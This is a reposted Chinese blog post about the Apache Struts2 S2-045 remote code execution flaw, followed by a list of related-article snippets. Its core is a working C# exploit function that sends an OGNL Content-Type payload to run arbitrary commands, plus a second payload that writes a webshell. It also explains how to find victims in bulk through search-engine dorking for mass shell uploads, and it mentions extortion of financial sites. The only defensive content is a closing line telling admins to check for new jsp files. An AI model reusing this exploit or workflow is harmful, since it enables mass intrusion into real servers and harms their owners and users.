Strtus2 S2-045漏洞

最新推荐文章于 2022-08-22 10:57:28 发布
最新推荐文章于 2022-08-22 10:57:28 发布
阅读量274 收藏
点赞数
文章标签: shell java c#
原文链接:http://www.cnblogs.com/makemoney/p/6537213.html
版权

S2-045漏洞已经爆发几天了,但还很多网址都存在此漏洞,很多金融类网站也收到了保护费通知、、、唉,收保护费少,报警无效!只能酌情处理了!做黑产的,还是少做为秒,常在河边站哪有不湿鞋,劝各位早日金盆洗手!

 

至于漏洞原理我就不多讲了!为啥??? 因为我也没研究,我也不懂!!!

 

有工作室找我写了一个批量shell的工具,我只是简单的放出一部分代码。使用的C#

public static string ExecuteStruts2(string url,string cookie,string cmd)
        {
            ServicePointManager.SecurityProtocol = SecurityProtocolType.Ssl3;
            HttpWebRequest request = null;
            try
            {
                request = (HttpWebRequest)WebRequest.Create(url);
                request.Method = "GET";
                request.AllowAutoRedirect = false;
                if (!string.IsNullOrEmpty(cookie)) {
                    request.Headers.Add("Cookie",cookie);
                }
                
                request.ContentType = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+cmd+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}";
                request.UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";
                request.Timeout = 50000;
                request.ServicePoint.ConnectionLimit = 500;
                HttpWebResponse response = (HttpWebResponse)request.GetResponse();
                string result = "";
                string encoding = "gb2312";
                if (!string.IsNullOrEmpty(response.CharacterSet)) {
                    encoding = response.CharacterSet;
                }
                Stream myResponseStream = response.GetResponseStream();
                StreamReader myStreamReader = new StreamReader(myResponseStream, Encoding.GetEncoding(encoding));
                result = myStreamReader.ReadToEnd();
                myStreamReader.Close();
                myResponseStream.Close();
                response.Close();
                request.Abort();
                return result;
                
            }
            catch(Exception ex)
            {
                request.Abort();
                return "执行错误:"+ex.Message;
            }

        }

  这个是执行命令的,比如创建用户,提权,然后可以远程或者传马

 

还可以上传webshell,只要把ContentType修改成:

%{(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#luan='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#path=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest').getSession().getServletContext().getRealPath('"+path+ "')).(#shell='我是shell').(new java.io.BufferedWriter(new java.io.FileWriter(#path+'/shell文件名').append(#shell)).close()).(#cmd='echo path:'+#path).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

 

还有其他玩法可以自行修改。然后就是inurl:****.action,然后爬搜索引擎,抓url,批量检测,批量上传shell。

有用struts2的赶紧看看最近几天有没有生成的jsp,jspx等的新文件吧,至于修复,网上很多办法,还有第三方工具等

转载于:https://www.cnblogs.com/makemoney/p/6537213.html

weixin_30655219
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
原创:struts2-045漏洞浅析
rossrocket的博客
03-28 1万+
这是小弟写的第一篇网文,文笔一般,请大家多包涵。近期发生了很多事,使我醒悟要回归自我的同时,要作些改变,所以开始写网文,且把这些网文分享至个人的微信公众号(公众号名:永记士多)和CSDN博客(博客账号:rossrocket,昵称:永记士多)。此微信公众号和CSDN博客现定位为:专门研究web应用的漏洞,性能,并发量,框架选择等问题,技术涵盖编程语言(java,php,python)、应用框架(st
struts2 s2-045
03-22
Struts2 S2-045 是一个著名的安全漏洞,主要影响使用Apache Struts2框架开发的Web应用程序。这个漏洞是由于Struts2的核心组件存在的一个逻辑错误,导致了远程代码执行(RCE)的可能性,这使得攻击者可以完全控制受...
str2-045漏洞事件,你想要的这里都有
chengman3837的博客
03-09 202
话说昨天一觉醒来,发现整个安全圈被一个名为str2-045漏洞霸屏了,好多小伙伴已经开始了喜刷刷的艰苦奋斗过程。然而对于很多小白童鞋来讲,他们可能还是处于懵逼的状态,别急,咱们专门为你们做了一期专题,来告诉你这到底是咋回事! 这个漏洞的全名啊,叫做:基于Jakarta插件的插件的Str...
修复Struts2 045漏洞(s2-045)
长心子的博客
05-09 1613
升级Struts2 2.3.28.1 到struts2-core-2.3.28.1 替换jar: freemarker-2.3.22.jar ognl-3.0.21.jar struts2-core-2.3.34.jar xwork-core-2.3.34.jar struts2-json-plugin-2.3.34...
struts2-045远程命令执行漏洞
u013894638的博客
03-14 1600
漏洞引发的威胁: 服务器直接被远程控制。 CVSS:(AV:R/AC:L/Au:NR/C:C/A:C/I:C) score:10.00(最高10分,高危) 即:远程攻击、攻击难度低、不需要用户认证,对机密性、完整性、可用性均造成完全影响。 影响产品: Apache Struts Xwork 信息来源: CNVD 解决方法: 把Struts2的版本升级到Struts2.3.32版本
struts2漏洞s2-045漏洞利用测试
feinifi的博客
02-20 6370
s2-045漏洞是一个可以执行远程命令的漏洞,该漏洞struts2上传文件使用参数struts.multipart.parser=jakarta,并且文件上传采用了commons-fileupload的api导致的。只是使用struts.multipart.parser=jakarta并不能导致这个问题,需要在请求时,请求头使用Content-Type参数,这个参数必须带上一串奇怪的ognl表达...
struts2漏洞s2-045,不升级jar版本的修补方法,已验证.docx
07-04
Struts2 漏洞 S2-045 修补方法 Struts2 是一个基于 Java 的 Web 应用程序框架,广泛应用于企业级应用程序中。然而,Struts2 中存在着一些漏洞,例如 S2-045 漏洞,该漏洞可能会导致严重的安全问题。今天,我们将...
Struts2 045漏洞S2-045漏洞利用工具python 视图版
03-07
Struts2 045漏洞S2-045漏洞利用工具python 视图版 执行python exp.py后 自动弹出对话框
s2-045漏洞检测工具
01-11
s2-045漏洞检测工具
struts2.3.32修补S2-045漏洞所有核心jar包及依赖的jar(含core包)
03-09
S2-045漏洞是一个严重的远程代码执行(RCE)漏洞,存在于Apache Struts2的OGNL表达式语言中。这个漏洞允许攻击者通过精心构造的HTTP请求在服务器端执行任意代码,对系统安全构成极大威胁。Struts2.3.32的发布就是...
Struts2-045远程代码执行漏洞复现
jiji_king的博客
07-05 606
个人笔记
Struts2-045漏洞处理时遇到的坑(升级Struts2.5需要特别注意的配置)
qq_39998555的博客
01-31 1414
最近公司的ssh搭建老项目出现了问题,被人抓到了漏洞获取了权限,幸好是名白客没有进行大肆破坏,找到原因是Struts2框架在之前就爆出的045漏洞,分享出自己在解决时遇到的坑。 关于检测Struts2漏洞的方法: 可以下载K8大神的Struts漏洞检测工具http://qqhack8.blog.163.com/blog/static/1141479852014631102759126/
Struts2-045分析(CVE-2017-5638)
xiao190128的专栏
03-10 3843
漏洞简介 漏洞名称:Struts2-045 漏洞类型:远程执行命令 漏洞等级:高危 漏洞原因:基于Jakarta Multipart parser的文件上传模块在处理文件上传(multipart)的请求时候对异常信息做了捕获,并对异常信息做了OGNL表达式处理。但在在判断content-type不正确的时候会抛出异常并且带上Content-Type属性值,可通过精心构造附带OGNL表达式的
S2-045 Struts 2漏洞(CVE-2017-5638) 实战
shylcok的博客
08-11 792
公司接到阿里云需要升级Struts 2的邮件,因为 我们公司用的 Struts 2版本 有远程代码执行漏洞。但是 如果执行一些和文件,目录相关的操作 就会提示: 没有那个文件或目录。1.抓包,使用bp或者Charles都行 (我这使用Charles)现在可以执行查看路径等一些权限,但是还做不到删除,新增等一些操作。重要的是,下图中 Content-Type的内容 进行修改。2.改包(1.打断点2.repeat一下3修改需要修改的)当中的重点就是加粗字体:(#cmd='"ls"')......
str045漏洞提权linux,Linux运维知识之CVE-2016-5195 Dirtycow: Linux内核提权漏洞
weixin_39636610的博客
05-16 272
本文主要向大家介Linux运维知识之CVE-2016-5195 Dirtycow: Linux内核提权漏洞绍了,通过具体的内容向大家展现,希望对大家学习Linux运维知识有所帮助。CVE-2016-5195Dirtycow:Linux内核提权漏洞以下都是github上找的源码,然后在ubuntu-12.04.5-desktop-i386上实验成功首先运行下面的确定漏洞:/*##########...
s2-045 java_注意!Struts2 S2-045漏洞被利用
weixin_35857225的博客
02-22 247
Struts2的网站赶紧升级修复漏洞;另外高手们不要搞别人网站,以免被查水表。S2-045漏洞已经爆发几天了,但还很多网址都存在此漏洞,很多金融类网站也收到了保护费通知、唉,收保护费少,报警无效!只能酌情处理了!做黑产的,还是少做为秒,常在河边站哪有不湿鞋,劝各位早日金盆洗手!至于漏洞原理我就不多讲了!为啥??? 因为我也没研究,我也不懂!!!有工作室找我写了一个批量shell的工具,我只是简单...
漏洞复现 - - -Struts2(s2-045)远程命令执行漏洞
weixin_67503304的博客
08-22 7303
从源码的角度分析Struts2(s2-045)远程命令执行漏洞,利用java详细讲解造成漏洞的原因,包含了Structs2高危漏洞exp的扫描利用工具
struts2漏洞_学生会私房菜 S2-045 Remote Code Execution漏洞利用
weixin_39899776的博客
11-28 554
学生会私房菜学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题。本期文档内容为:《S2-045 Remote Code Execution漏洞利用》作者介绍:Fhawkz福建师范大学18级学生,国科学生会安全团队的一员,本人对技术喜欢进行钻研,平时也爱鼓捣一些安全的相关技术,本次分享是自己在日常学习中有用到的一些技术,希望给大家带来一些安全学习上的帮助。0x...
str045漏洞提权linux,SUDO漏洞提权实战(CVE-2021-3156 POC)
weixin_30539317的博客
05-16 692
引言最近刷公众号看到了一个sudo的漏洞,看漏洞介绍是个堆缓冲区溢出的漏洞,出于手痒想跟进一下这个漏洞。经过一番折腾,发现这个漏洞还挺典型的,于是总结了一些想法。接下来我会在漏洞分析、提权原理、利用方案、实战分析等方面表达一些自己的观点。漏洞分析这几天网上对这个漏洞分析已经挺多的了,这里我再简略分析一下,详情可以参考一下Qualys团队的研究记录。Qualys团队统计的漏洞影响范围是1.8.2 –...
apache struts2框架命令执行漏洞(s2-045s2-046)
最新发布
01-11
Apache Struts2框架是一种流行的开源Web应用程序开发框架,但曾经发生过多个命令执行漏洞,其中包括s2-045s2-046漏洞s2-045漏洞源于在处理远程表达式语言(OGNL)时存在安全漏洞,攻击者可以利用构造特定的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值